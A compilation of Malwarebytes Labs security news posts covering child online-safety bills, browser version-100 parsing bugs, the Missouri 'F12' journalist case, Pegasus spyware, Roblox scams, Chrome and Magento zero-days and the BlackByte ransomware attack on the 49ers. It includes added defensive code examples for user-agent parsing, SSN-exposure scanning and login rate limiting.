IT NEWS

US senators introduce the Kids Online Safety Act (KOSA)

US Senators Richard Blumenthal of Connecticut and Marsha Blackburn of Tennessee have introduced the Kids Online Safety Act (KOSA), legislation that aims to enhance children’s safety online.

This follows The Wall Street Journal’s (WSJ) reporting on the harm Instagram can inflict on teens, which was based on internal Facebook documents that whistleblower Frances Haugen leaked to the WSJ, and comes after multiple hearings in which social media companies were questioned about their failures to protect kids online.

“Protecting our kids and teens online is critically important, particularly since COVID increased our reliance on technology,” said Blackburn in a press release.

“Big Tech has brazenly failed children and betrayed its trust, putting profits above safety. Seared in my memory—and motivating my passion—are countless harrowing stories from Connecticut and across the country about heartbreaking loss, destructive emotional rabbit holes, and addictive dark places rampant on social media. The Kids Online Safety Act would finally give kids and their parents the tools and safeguards they need to protect against toxic content—and hold Big Tech accountable for deeply dangerous algorithms. Algorithms driven by eyeballs and dollars will no longer hold sway.”

In a one-page summary document, KOSA is presented as a solution to a longstanding problem: social media platforms playing a hand in harming the mental health and well-being of their most vulnerable users, children and teens. The senators outlined how parents or carers and young social media users would benefit from KOSA, which would:

  • Require social media platforms to give their young users (age 16 and below) options to protect their personal information, disable features that foster addiction, and opt out of algorithmic recommendations. These recommendation algorithms draw on a user’s personal data to suggest content that keeps them scrolling.
  • Require platforms to enable the strongest safety settings for minors by default.
  • Give parents tools to support the children in their care and identify harmful behavior. Platforms would also have to provide parents and kids a dedicated channel for reporting harms.
  • Create a duty for social media platforms to prevent and mitigate content that could harm minors, including the promotion of products that are unlawful for minors (e.g. gambling and alcohol), self-harm, substance abuse, eating disorders, sexual exploitation, and suicide.
  • Require social media platforms to undergo an annual independent audit assessing risks to minors, compliance with the legislation, and whether they are taking meaningful steps to prevent harm. The output of this assessment would be an annual report.
  • Give academic researchers and non-profit organizations access to critical platform datasets to foster research on the safety and well-being of minors. The National Telecommunications and Information Administration would be required to set up a program through which researchers could apply for datasets from these platforms.

Meanwhile in California, lawmakers introduced a bill on Thursday that would require platforms such as Meta and YouTube to limit the collection of children’s data. If passed into law, profiling young users for targeted advertising would be restricted, age-appropriate content policies would be mandated, and behavioral nudges that push children and teens into weakening their privacy protections would be banned.

This California bill is said to be modeled after the UK’s Age Appropriate Design Code (aka “Children’s Code”), which came into force in September 2021.

The post US senators introduce the Kids Online Safety Act (KOSA) appeared first on Malwarebytes Labs.

Firefox and Chrome reaching major versions 100 may break some websites

Mozilla has issued a warning about the upcoming version 100 releases of both Chrome and Firefox. The change in the major version number from two to three digits may break websites that are not prepared for it. For example, some user agent parsing libraries may have hard-coded assumptions or bugs that don’t account for three-digit major version numbers.

Version 100

Chrome is expected to reach its first three-digit major version in the first half of 2022. According to the Firefox release calendar, Firefox Nightly will reach version 100 during the first quarter of 2022 (probably March), which puts the stable release of Firefox 100 in early May 2022.

For now, the estimated dates are March 29 for Chrome and May 3 for Firefox.

User agent string

The problem originates in the user agent string that browsers send to the websites you visit. If you are the kind of person who uses different browsers or devices to access websites, you may have noticed that sites can look quite different depending on which browser you use to view them. When your browser sends a request to a website, it identifies itself with the user agent string before it retrieves the content you’ve requested. The data in the user agent string helps the website deliver the content in a format that suits your browser. Even though relying on user agents alone is no longer enough to optimize a website, they are still an important source of information.

For web browsers the format of the user agent string is:

[Browser]/[version] ([system and browser information]) [platform] ([platform details]) [extensions]

For example the latest version of Firefox will show:

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

Why is that a problem?

As we pointed out, websites read the user agent string and optimize their content for the browser they identify by reading that information.

Some website developers have written their own routines, or use JavaScript libraries, that look for the string Firefox and then grab either the first two characters after the slash “/” or the last two characters before the “.”. That poses no problem as long as the user agent string reports a two-digit version, but once that part changes to Firefox/100.0 these routines will report your Firefox version as “10” or “00” respectively. Other libraries may return a null result, which will effectively break the site. A related trap is comparing version numbers as strings rather than as integers: “100” sorts before “60” in a lexical comparison, so a check like “is the version at least 60?” fails for version 100.

As a result of a mismatched version number, the visitor may be served the version of the website designed for very early releases of their browser, or the fallback version meant for “unidentifiable” browsers. This is usually not an optimal experience.
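To make the failure concrete, here is an added example (not code from the Malwarebytes post, nor from any real parsing library): a fragile version extractor of the kind described above, placed next to a robust one, and run over user agent strings constructed for this example. The Firefox/97.0 string is the one quoted above; the Firefox/100.0 and Chrome/100.0.0.0 strings are made up to look like 100-series releases.

```javascript
// Added example, not from the Malwarebytes post or from any real UA library.
// The user agent strings are constructed for this example; Firefox/97.0 is the
// string quoted in the article, the other two are made up 100-series strings.
const SAMPLE_UAS = {
  firefox97: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0",
  firefox100: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0",
  chrome100: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36",
};

// Fragile: assumes the major version is exactly two characters after "Firefox/".
// Yields "97" for Firefox 97 but "10" for Firefox 100.
function naiveFirefoxMajor(ua) {
  const idx = ua.indexOf("Firefox/");
  if (idx === -1) return null;
  const start = idx + "Firefox/".length;
  return ua.slice(start, start + 2);
}

// Robust: take every digit up to the next "." (or whitespace / end of string)
// and convert to a number. Works for 9, 97, 100 and beyond; returns null when
// the product token is absent from the string.
function parseMajorVersion(ua, product) {
  const re = new RegExp("(?:^|\\s)" + product + "/(\\d+)(?:\\.|\\s|$)");
  const m = re.exec(ua);
  return m ? Number.parseInt(m[1], 10) : null;
}

// Fragile in a second way: the digits are extracted correctly, but the
// comparison is done on strings, so "100" >= "60" is false ("1" sorts before "6").
function lexicalIsAtLeast(ua, product, minMajor) {
  const major = parseMajorVersion(ua, product);
  if (major === null) return false;
  return String(major) >= String(minMajor);
}

// Feature gate done correctly: numeric comparison on the parsed integer.
function isAtLeast(ua, product, minMajor) {
  const major = parseMajorVersion(ua, product);
  return major !== null && major >= minMajor;
}

// Usage: compare what each routine reports for the three sample strings.
for (const [name, ua] of Object.entries(SAMPLE_UAS)) {
  console.log(name, {
    naive: naiveFirefoxMajor(ua),
    firefox: parseMajorVersion(ua, "Firefox"),
    chrome: parseMajorVersion(ua, "Chrome"),
    gateLexical: lexicalIsAtLeast(ua, "Firefox", 60),
    gateNumeric: isAtLeast(ua, "Firefox", 60),
  });
}
```

The same two mistakes, a fixed-width slice and a string comparison, are what the Edge experiment flag mentioned below is meant to flush out: flip the flag, load your site, and any gate built on these routines will start misclassifying the browser.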

Testing

Both Mozilla and Google are testing the compatibility of major websites ahead of time.

Drawing on the experience gained when browsers first reached version 10, and many issues were discovered in user agent parsing libraries, Google has warned that developers and IT admins should test their services in advance to avoid a repeat.

For sites with issues that Mozilla or Google cannot get fixed before these versions are released, both companies have backup plans ready to ensure those sites keep working.

If you would like to help testing or to test your own site, you can read here how to proceed, and if you notice something that is breaking because of the user agent string, you are welcome to file a report on webcompat.

Edge

Edge is not far behind in version number, but since Edge is a Chromium-based browser the worst problems will likely have been found by the time it gets there. Starting with Microsoft Edge 97, site owners can test the upcoming user agent string by enabling the #force-major-version-to-100 experiment flag in edge://flags, to check that their user agent parsing logic is robust and works as expected.

The post Firefox and Chrome reaching major versions 100 may break some websites appeared first on Malwarebytes Labs.

Journalist won’t be indicted for hacking for viewing a state website’s HTML

A journalist incorrectly branded as a “hacker” by the governor of Missouri won’t be prosecuted “for hacking”.

This was a quick and widely expected win for St. Louis Post-Dispatch reporter Josh Renaud, after a Cole County prosecutor declined to pursue the criminal charges Missouri Governor Mike Parson had called for over Renaud allegedly hacking a government website by viewing its public HTML code, something anyone can do by simply pressing the F12 key.

Perhaps because of the absurdity of the allegation, Internet users following the case took to calling it “the F12 case”.

Locke Thompson, a Cole County Prosecutor, released a statement on Friday last week, which reads in part:

“There is an argument to be made that there was a violation of law. However, upon a review of the case file, the issues at the heart of the investigation have been resolved through non-legal means. As such, it is not in the best interest of Cole County citizens to utilize the significant resources and taxpayer dollars that would be necessary to pursue misdemeanor criminal charges in this case. The investigation is now closed, and the Cole County Prosecutor’s Office will have no further comment on the matter.”

How it all began

In October 2021, St. Louis Post-Dispatch pushed out Renaud’s story about a flaw on a website maintained by the Missouri Department of Elementary and Secondary Education (DESE) which exposed Social Security numbers (SSNs) of administrators, counselors, and school teachers across the state, putting more than 100,000 educators at risk.

According to Renaud’s article, the teachers’ SSNs were contained in the site’s HTML source code. This is easily viewed by pressing the F12 function key, which opens the browser’s developer tools alongside the webpage. When consulted, Shaji Khan, a cybersecurity professor at the University of Missouri-St. Louis, confirmed Renaud’s findings, calling it “a serious flaw.”

“We have known about this type of flaw for at least 10-12 years, if not more,” Khan was quoted in an email, “The fact that this type of vulnerability is still present in the DESE web application is mind-boggling!”

The department was supposed to discuss Renaud’s findings, but things took a quick turn for the worse. On Wednesday evening, the department sent out a letter to teachers and posted a press release on its website, minimizing the flaw’s impact and blaming Renaud—and by association, the Post-Dispatch—for taking records of educators from their site.

Education Commissioner Margie Vandeven said in a letter to teachers that “an individual took the records of at least three educators, unencrypted the source code from the webpage, and viewed the social security number (SSN) of those specific educators.”

An echo of this sentiment was reflected in the press release, further stating that the person (Renaud) responsible for discovering the flaw was a “hacker” and “took the records of at least three educators.”

In reality, according to the Post-Dispatch, Renaud had discovered the flaw and confirmed that the nine-digit numbers he’d seen in the webpage’s code were indeed SSNs. The paper had also told DESE that it confirmed the flaw with three educators and Professor Khan. The Post-Dispatch further noted that these SSNs were available and searchable by anyone through DESE’s educator certification search tool on its website.

Although the SSNs in the HTML were encoded rather than in plain text, they were not encrypted, said Khan in a separate Post-Dispatch article. Encrypted data can only be read by someone holding the decryption key; encoded data is merely the same data in a different representation, and anyone who recognizes the encoding can reverse it without any secret.

“Anybody who knows anything about development—and the bad guys are way ahead—can easily decode that data,” Khan said. That wasn’t even the issue though. The bigger problem, according to Khan, was the presence of sensitive data accessible by anyone with a browser.

DESE made teacher information accessible to local school districts for verifying a teacher’s certification. As SSNs were part of that information pool, it would be easy to identify an educator using the last four digits of their SSN. After Renaud reported the flaw, DESE took the search tool down.
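The encoded-versus-encrypted distinction above is exactly what a pre-release check should catch. The following is an added example (not code from the article, the Post-Dispatch, or the DESE site) of a scanner that walks rendered HTML for SSN-shaped values, both in plain text and behind a reversible encoding. It assumes base64 as the encoding, since the article does not say which one DESE used; the HTML, names and numbers in it are constructed for the example (078-05-1120 is the well-known Woolworth sample SSN, not a real person’s). It runs under Node.js.

```javascript
// Added example, not code from the article, the Post-Dispatch, or the DESE site.
// Scans rendered HTML for SSN-shaped values in plain text and behind base64
// (base64 is an assumption; the article does not say which encoding DESE used).
// The HTML, names and numbers below are constructed for this example. Node.js.

const SAMPLE_HTML = `
<table id="cert-search">
  <tr data-cert="MDc4MDUxMTIw"><td>Jane Doe</td><td>Certified</td></tr>
  <tr data-ssn="078-05-1120"><td>John Roe</td><td>Certified</td></tr>
  <tr><td>Phone: 555-123-4567</td><td>Record 20211014001</td></tr>
</table>
<script>var buildHash = "a3f9c2d1b4e5a6f7c8d9e0f1a2b3c4d5";</script>
`;

// Nine digits, optionally with the usual 3-2-4 dashes, not part of a longer digit run.
const SSN_SHAPED = /(?<!\d)\d{3}-?\d{2}-?\d{4}(?!\d)/g;
// Candidate base64 tokens: a 9-digit number encodes to 12 characters, so require at least that.
const BASE64_TOKEN = /[A-Za-z0-9+/]{12,}={0,2}/g;

// Structural rules the SSA applies to issued SSNs: area 000, 666 and 900-999 are
// never issued, nor are group 00 or serial 0000. This drops many phone numbers and IDs.
function looksLikeSsn(s) {
  const digits = s.replace(/-/g, "");
  if (digits.length !== 9) return false;
  const area = Number(digits.slice(0, 3));
  const group = Number(digits.slice(3, 5));
  const serial = Number(digits.slice(5));
  if (area === 0 || area === 666 || area >= 900) return false;
  return group !== 0 && serial !== 0;
}

// Decode a token only if it is canonical base64 (length a multiple of 4 and it
// round-trips). Hex hashes can still pass this test; they are decoded and checked
// like everything else and almost never yield nine consecutive ASCII digits.
function decodeBase64Strict(tok) {
  if (tok.length % 4 !== 0) return null;
  const buf = Buffer.from(tok, "base64");
  return buf.toString("base64") === tok ? buf.toString("latin1") : null;
}

// Returns one record per SSN-shaped value found, noting the encoding it sat behind.
function findSsnExposures(html) {
  const hits = [];
  for (const m of html.match(SSN_SHAPED) || []) {
    if (looksLikeSsn(m)) hits.push({ kind: "plain", value: m.replace(/-/g, "") });
  }
  for (const tok of html.match(BASE64_TOKEN) || []) {
    const decoded = decodeBase64Strict(tok);
    if (decoded === null) continue;
    for (const m of decoded.match(SSN_SHAPED) || []) {
      if (looksLikeSsn(m)) hits.push({ kind: "base64", value: m.replace(/-/g, ""), token: tok });
    }
  }
  return hits;
}

// Usage: feed it the page source a crawler fetched; a non-empty result should fail the build.
console.log(findSsnExposures(SAMPLE_HTML));
```

The phone number and the record ID in the sample are deliberately left unflagged, and the hex build hash decodes to bytes with no digit run, so the two findings are the plain-text SSN and the base64-encoded one. Any other reversible transform (hex, URL encoding, a custom lookup table) would need its own decoder added alongside `decodeBase64Strict`; none of them is a substitute for keeping the value out of the page in the first place.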

Joseph Martineau, a Lewis Rice attorney representing Post-Dispatch, issued the following response to DESE’s press release:

“The reporter did the responsible thing by reporting his findings to DESE so that the state could act to prevent disclosure and misuse. A hacker is someone who subverts computer security with malicious or criminal intent. Here, there was no breach of any firewall or security and certainly no malicious intent.

For DESE to deflect its failures by referring to this as ‘hacking’ is unfounded. Thankfully, these failures were discovered.”

It should also be noted Post-Dispatch held off publishing Renaud’s article to give DESE enough time to address the flaw in its site.

Missouri Gov. Mike Parson then held a live press conference about the vulnerability that put thousands of educators at risk. Parson accused the reporter (Renaud) of being a “hacker” and said his reporting “is an attempt to embarrass the state and sell headlines for their news outlet.”

The state of Missouri also targeted Professor Khan in their investigations, but this was halted after Khan sent a litigation hold and demand letter to Parson and some state agencies.

Relief for Renaud

Josh Renaud issued a statement expressing relief, and dismay at the damage done to him and his family. He described the entire ordeal as “a political prosecution of a journalist.”

“Despite this, I am proud that my reporting exposed a critical issue, and that it caused the state to take steps to better safeguard teachers’ private data. At the same time, I am concerned that the governor’s actions have left the state more vulnerable to future bad actors. His high-profile threats of legal retribution against me and the Post-Dispatch likely will have a chilling effect, deterring people from reporting security or privacy flaws in Missouri, and decreasing the chance those flaws get fixed.”

Gov. Parson could have responded to Renaud’s reporting differently, and hacker Rachel Tobac couldn’t have encapsulated this more perfectly:

The post Journalist won’t be indicted for hacking for viewing a state website’s HTML appeared first on Malwarebytes Labs.

Ban Pegasus spyware, urges European Union Data Protection Supervisor

The European Data Protection Supervisor (EDPS) has urged the EU to ban the development and deployment of spyware with the capabilities of Pegasus to protect fundamental rights and freedoms.

What is Pegasus?

On July 18, 2021, a consortium of 17 newspaper and media organizations, aided by Amnesty International’s Security Lab and the research group Citizen Lab, revealed that one of the world’s most advanced and viciously invasive spyware tools had been used to hack, or attempt to hack, into 37 mobile phones owned by human rights activists, journalists, political dissidents, and business executives.

This spyware, called Pegasus and developed by the Israeli company NSO Group, is reportedly instrumental to several governments’ oppressive surveillance campaigns against their own citizens and residents. Pegasus is designed to successfully attack almost any smartphone running either iOS or Android, needing only very basic information about the target, such as a telephone number. Pegasus effectively turns the smartphone into a 24/7 surveillance device by gaining complete access to all sensors and information on the phone, including messages before they are encrypted, geolocation, camera, and calls. As Amnesty International’s Security Lab put it:

“Pegasus can do more than what the owner of the device can do.”

For an in-depth look at Pegasus, have a listen to our podcast about the world’s most coveted spyware, Pegasus: Lock and Code S03E04.


What is the EDPS?

The European Data Protection Supervisor (EDPS) is the European Union’s (EU) independent data protection authority. The EDPS is an increasingly influential supervisory authority that aims to provide requested as well as unsolicited advice to EU institutions and bodies on all matters relating to the processing of personal data.

Besides monitoring and ensuring the protection of personal data and privacy when EU institutions and bodies process the personal information of individuals, one of the EDPS missions is to monitor new technology that may affect the protection of personal information.

Level of intrusiveness

The EDPS is convinced that the use of Pegasus might lead to an unprecedented level of intrusiveness, threatening the very essence of the right to privacy, since the spyware is capable of interfering with the most intimate aspects of our daily lives.

The EDPS warns against regarding Pegasus as yet another law enforcement interception tool, but more as a hacking tool that has to be seen as a government Trojan in the form of a permanent backdoor. Unfortunately, Pegasus is not the only spyware tool of this type that is marketed as a law enforcement tool. However, Pegasus is considered a game-changer that renders existing legal and technical safeguards ineffective and meaningless.

EU law

Targeted surveillance is regulated in the national legislation of virtually every EU member state. But Article 52(1) of the EU Charter of Fundamental Rights requires that any limitations on the exercise of the fundamental rights and freedoms of the individual are proportionate and necessary. Such limitations must in any event be provided for by law and respect the essence of the fundamental rights and freedoms as recognized by the Charter.

The EDPS considers that only in cases of a very exceptional nature could Pegasus meet the requirements of proportionality and even in those cases less intrusive surveillance tools would be preferable. Therefore, using information gathered with the help of Pegasus and similar tools is likely to be considered inadmissible in a court of law. Also, many forensic experts may not have the necessary knowledge to identify and examine such highly advanced technology developed by private companies.

The advice

In its conclusion, the EDPS states that:

“Pegasus constitutes a paradigm shift in terms of access to private communications and devices, which is able to affect the very essence of our fundamental rights, in particular the right to privacy. This fact makes its use incompatible with our democratic values.”

The EDPS therefore believes that a ban on the development of spyware with the capability of Pegasus in the EU would be the most effective option to protect our fundamental rights and freedoms.

It goes on to provide a list of steps and measures to block the unlawful use of Pegasus and similar tools:

  • Strengthen democratic oversight of surveillance measures.
  • Strictly implement the EU legal framework on data protection.
  • Make judicial review of surveillance order applications more than a mere formality.
  • Outlaw the use of highly intrusive hacking tools in criminal procedural law.
  • Reduce the risk of data obtained by such methods reaching EU databases (e.g. Europol).
  • Stop (ab)using “national security” purposes to legitimize politically motivated surveillance.
  • Address deficiencies in the rule of law that create grounds for abuse of secret surveillance.
  • Raise awareness and foster public debate to support and empower civil society.

By publishing this document, the EDPS has made its contribution to the public discussion on whether there is a place for spyware tools like Pegasus in a democratic society.

The ban

Given that some member states of the EU are listed as NSO Group customers, the reason for requesting this ban is clear. It should also be clear by now that the individuals targeted by using Pegasus are not terrorist organizations, drug cartels, human traffickers, pedophile rings or other criminal syndicates, but rather reporters, scientists, romantic partners, and potentially even heads of state.

But given how hard it is to detect such tools on affected devices, and, even when they are detected, to find out who is behind the infection, some people and organizations will still be willing to risk using them.

Stay safe, everyone!

The post Ban Pegasus spyware, urges European Union Data Protection Supervisor appeared first on Malwarebytes Labs.

Roblox Beamers steal items from kids

Roblox gamers are once again being warned to be on their guard against scammers plundering valuable digital items.

Most multiplayer titles are all about customization. You won’t find many popular games where digital items aren’t up for grabs. Some games lock the items, such as outfits, weapons, or valuables, to your account and/or characters. Other games allow players to trade them. Those trades can be straightforward item swaps, or paid for with in-game fictional currency. They might end up on marketplaces where they’re bought and sold with real world cash. It all depends. This isn’t new, but it is awful.

What’s happening with Roblox?

Roblox allows you to make your own games, or just take part in challenges created by others. It’s constantly changing, and there’s always something new to do. As a result, it’s hugely popular with young kids and teens. Their accounts and digital items are highly coveted by scammers and account compromisers. In Roblox land, these people are known as “Beamers”.

Beamers use a variety of tricks to compromise accounts, and then head off to various shady marketplaces. There, they try to sell or trade for US dollars or cryptocurrency. This is pretty commonplace for a large number of online titles, but ripping off kids is always going to leave a bad taste in the mouth.

How do scammers rip off Roblox players?

It’s a mixture of old and new techniques. Below, we’ve listed some from the Beamer article and a few which we’ve looked at ourselves. Forewarned is forearmed, and all that.

  • Phishing: Beamers use creation kits to whip up bogus sites for their imitation domains. As the article mentions, it often begins with a message sent to another player. While we don’t know the content of those messages, a popular trick is to pretend they’re a game admin or mod. The Beamer might claim the victim is in trouble, or has failed a safety check. Or they might claim to be offering a cool free item.
  • SIM swap: Another timeless classic. This is where attackers trick a mobile carrier into moving the victim’s phone number to a SIM the attackers control. By doing so, they can bypass SMS-based two-factor authentication, because the codes end up being sent to them instead of the victim.
  • Generators: Never discount the allure of free in-game currency. Generators aren’t mentioned in the article, but they are a mainstay of scam tactics. Offer a bogus tool, claim it creates as much currency as the victim requires, and have them run it. The executable may contain malware, or it may direct the user to a phish or a survey scam.
  • Ransomware: Another one for the “I didn’t expect that” pile. In this particular instance, we’re talking about bogus versions of real tools that automate certain game functions, which deliver ransomware instead.

Scammer hideouts and information gathering tools

It appears a lot of the Beamer activity takes place inside services such as Discord. This makes sense; it’s a fast, easy way to keep trades flowing with minimal set-up fuss for the creator to worry about. Tying Discord channels to phishing pages so the owner knows when someone has entered details is part of the trick.

Additionally, gaming data often feeds into third-party sites. This can be useful: if you play an MMORPG and need to buy low and sell high, there’s usually a site for that, and it’s possible you’ll be able to see an item owner’s character details or the server they play on. Great for trades, but bad for painting a large target on your back. Years ago, scammers would filter Xbox 360 gamers by prestigious achievements and high gamerscores and mark targets that way. Now it’s far more item and commodity centric, but the account itself is still at risk of being hijacked and sold on.

Time to lock down your Roblox accounts

A good reminder, then, to keep yourself up to date with the security measures recommended on the Roblox security page. You can bet people are coming up with new and creative ways to relieve you of your account at any given moment. It’s up to you to ensure you’re always one step ahead of the item-stealing crowd.

The post Roblox Beamers steal items from kids appeared first on Malwarebytes Labs.

Update now! Chrome patches actively exploited zero-day vulnerability

Google has released an update for its Chrome browser that includes eleven security fixes, one of which has been reportedly exploited in the wild.

The vulnerability that is reported as being exploited in the wild has been assigned CVE-2022-0609.

CVE-2022-0609

The vulnerability is described as a use-after-free (UAF) vulnerability in the Animation component. A UAF is the result of incorrect handling of dynamically allocated memory during a program’s operation: the program frees a block of memory but keeps a pointer to it and later uses that pointer. By then the freed block may have been reallocated for something else, so an attacker who can control what is placed there can manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute attacker-controlled code. In this case, exploiting the vulnerability can lead to corruption of valid data and the execution of arbitrary code on affected systems.

As a result, a remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger the UAF vulnerability and execute arbitrary code on the target system.

The flaw was found and reported by Adam Weidemann and Clément Lecigne of Google’s Threat Analysis Group (TAG). As usual, Google hasn’t gone into any more detail about the bug. Access to bug details and links is usually restricted until the majority of users have updated to a fixed version.

Other vulnerabilities

Other vulnerabilities in this release that were reported by external researchers are:

  • CVE-2022-0603: Use after free in File Manager.
  • CVE-2022-0604: Heap buffer overflow in Tab Groups.
  • CVE-2022-0605: Use after free in Webstore API.
  • CVE-2022-0606: Use after free in ANGLE.
  • CVE-2022-0607: Use after free in GPU.
  • CVE-2022-0608: Integer overflow in Mojo.
  • CVE-2022-0610: Inappropriate implementation in Gamepad API.

How to protect yourself

If you’re a Chrome user on Windows, Mac, or Linux, you should update to version 98.0.4758.102 as soon as possible.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerability. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

[Screenshot: Chrome reporting that it is up to date]

After the update the version should be 98.0.4758.102. Since Animation is a Chromium component, users of other Chromium-based browsers can expect a similar update.

Stay safe, everyone!

The post Update now! Chrome patches actively exploited zero-day vulnerability appeared first on Malwarebytes Labs.

Adobe patches actively exploited Magento/Adobe Commerce zero-day

Adobe has released an emergency advisory for users of its Adobe Commerce and Magento Open Source platforms. It explains that a critical zero-day vulnerability is being actively exploited in attacks against sites that run these two content management systems (CMSs). Users should apply the patch as soon as possible.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability has been assigned CVE-2022-24086.

The flaw is described as an improper input validation vulnerability which could lead to arbitrary code execution. The vulnerability is exploitable without credentials and is rated as critical. It has been rated with a CVSS score of 9.8 out of 10.

A remote and unauthorized attacker can send a malicious request to the application and execute arbitrary code on the target server. Successful exploitation of this vulnerability may result in complete compromise of the affected system.

Adobe says its own security team discovered the flaw but it is aware that CVE-2022-24086 has been exploited in the wild in very limited attacks. No other information has been provided about the vulnerability to limit the possibility of further exploitation.

Needless to say, if you operate one of the affected products, patch now.

Affected products

Magento is an Adobe company that offers a hosted and a self-hosted CMS for web shops. The free version, Magento Open Source, is open source, which gives users the option to make their own changes and lets developers create extensions for the CMS; Adobe Commerce is the paid, supported edition.

The vulnerability affects Adobe Commerce and Magento Open Source 2.4.3-p1 and earlier versions, as well as 2.3.7-p2 and earlier versions.

Magecart

Only recently we published a blog about a new Magecart campaign which was aimed at Magento sites, but that campaign primarily targeted the Magento 1 version of the CMS which has reached end-of-life (EOL) and has not been supported since June 30, 2020. Were Magecart to get its hands on this vulnerability, that would raise the number of potential targets by hundreds of thousands.

Keeping your site safe

We have written an extensive post about how to defend your website against skimmers, but in summary, here’s what you need to do to keep your site safe:

  • Make sure that the systems used to administer the site are clean of malware.
  • Use strong passwords and do not reuse them.
  • Limit the number of administrators.
  • Keep your site’s software updated.
  • Use a Web Application Firewall (WAF).
  • Know that each dependency is a potential backdoor into your web pages.
  • Use a Content Security Policy (CSP).
  • Make sure you are made aware in case of problems, either by checking yourself or by having it done for you.

How to apply a patch

Download the patch for your version from Adobe’s advisory, unzip it, and follow Adobe’s instructions on how to apply a composer patch.

Stay safe, everyone!

The post Adobe patches actively exploited Magento/Adobe Commerce zero-day appeared first on Malwarebytes Labs.

Ransomware gang hits 49ers’ network before Super Bowl kick off

The San Francisco 49ers have confirmed that they have been hit by a ransomware attack. The announcement came just hours before the biggest football game of the year, Sunday’s Super Bowl between the Cincinnati Bengals and the Los Angeles Rams.

In a boilerplate statement to BleepingComputer, the 49ers revealed that the attack caused temporary disruption to their IT network. As of this writing, they are in the process of recovering affected systems:

“The San Francisco 49ers recently became aware of a network security incident that resulted in temporary disruption to certain systems on our corporate IT network. Upon learning of the incident, we immediately initiated an investigation and took steps to contain the incident.”

The BlackByte ransomware gang has already claimed responsibility for the attack by leaking a small number of files it claims to have stolen.

BlackByte

BlackByte ransomware is a relatively new ransomware-as-a-service (RaaS) tool that has been around since July 2021. It is used by affiliates who breach organizations, steal valuable information, and then use ransomware to encrypt the organizations’ files—rendering them unusable. They then demand a ransom to decrypt the files, and threaten to leak the stolen data if it’s not paid.

Like other ransomware groups, the threat actors using Blackbyte have been known to use software exploits to breach victims’ networks, such as Microsoft’s well-publicised ProxyShell vulnerability. This only highlights the importance of applying software patches whenever they have been made available.

Our friends at Trustwave published a two-part, in-depth analysis [1] [2] of the first version of BlackByte in October 2021. The analyses revealed a flaw in its code: the decryption/encryption key had been reused in multiple attacks. This allowed Trustwave researchers to create a free decryptor tool to help victims recover their files without paying the ransom.

Version two of BlackByte does not have this flaw, so the 49ers will likely have to rely on backups to recover its affected systems.

A timely FBI advisory

Just a couple of days before the attack, on Friday 11 February, the FBI released an advisory warning about the dangers of BlackByte ransomware:

As of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture). BlackByte is a Ransomware as a Service (RaaS) group that encrypts files on compromised Windows host systems, including physical and virtual servers.

The advisory includes a number of BlackByte indicators of compromise (IOCs)—digital clues such as files, hashes, file modifications, and registry changes—associated with BlackByte activity. These help IT and security professionals determine if it is on, or has been on, their systems.

Lastly, the FBI has advised organizations to keep regular backups of their data. That’s good advice, but there are other things you should consider too: network segmentation to limit an attacker’s ability to move through your network; patching all systems to prevent breaches; using two-factor authentication and rate limiting to prevent brute-force password guessing; and regular account audits to beef up account security.
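As an added example of the rate-limiting advice above (this is not code from the original post or from the FBI advisory), here is a Python sliding-window lockout for failed logins that tracks failures both per account and per source IP, so that it catches credential stuffing spread over many addresses as well as password spraying across many accounts from one address. The thresholds, the `simulate_spray` scenario and the IP addresses in it are constructed; timestamps are passed in explicitly so the behaviour can be checked without waiting on a clock.

```python
"""Sliding-window lockout for failed logins, tracked per account and per
source IP. Timestamps are passed in explicitly so the logic is testable."""
from collections import defaultdict, deque


class FailedLoginLimiter:
    def __init__(self, max_failures=5, window_seconds=300, lockout_seconds=900):
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self._failures = defaultdict(deque)  # key -> recent failure timestamps
        self._locked_until = {}              # key -> time at which the lock expires

    @staticmethod
    def _keys(username, source_ip):
        # Per-account catches credential stuffing spread over many IPs;
        # per-IP catches password spraying across many accounts.
        return (("user", username.lower()), ("ip", source_ip))

    def is_blocked(self, username, source_ip, now):
        return any(self._locked_until.get(k, 0) > now
                   for k in self._keys(username, source_ip))

    def record_failure(self, username, source_ip, now):
        for key in self._keys(username, source_ip):
            recent = self._failures[key]
            recent.append(now)
            while recent and recent[0] <= now - self.window:
                recent.popleft()          # drop failures outside the window
            if len(recent) >= self.max_failures:
                self._locked_until[key] = now + self.lockout
                recent.clear()

    def record_success(self, username, source_ip, now):
        # A successful login resets the account counter only; the IP keeps its
        # history so one valid account cannot launder a spraying source.
        self._failures.pop(("user", username.lower()), None)


def simulate_spray(limiter, source_ip="203.0.113.9", attempts=20):
    """Constructed scenario: one IP tries a password against many accounts.
    Returns the attempt index at which the IP was first refused, or None."""
    for i in range(attempts):
        now = 10.0 * i
        user = f"user{i}@example.test"
        if limiter.is_blocked(user, source_ip, now):
            return i
        limiter.record_failure(user, source_ip, now)
    return None


if __name__ == "__main__":
    print("spray refused at attempt", simulate_spray(FailedLoginLimiter()))
```

With the defaults (five failures in five minutes, fifteen-minute lockout) the spraying source is refused on its sixth attempt even though every attempt hit a different account. In production the counters would live in a shared store such as Redis rather than in process memory, and the lockout response should look identical for existing and non-existent accounts so that it does not leak which usernames are valid.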

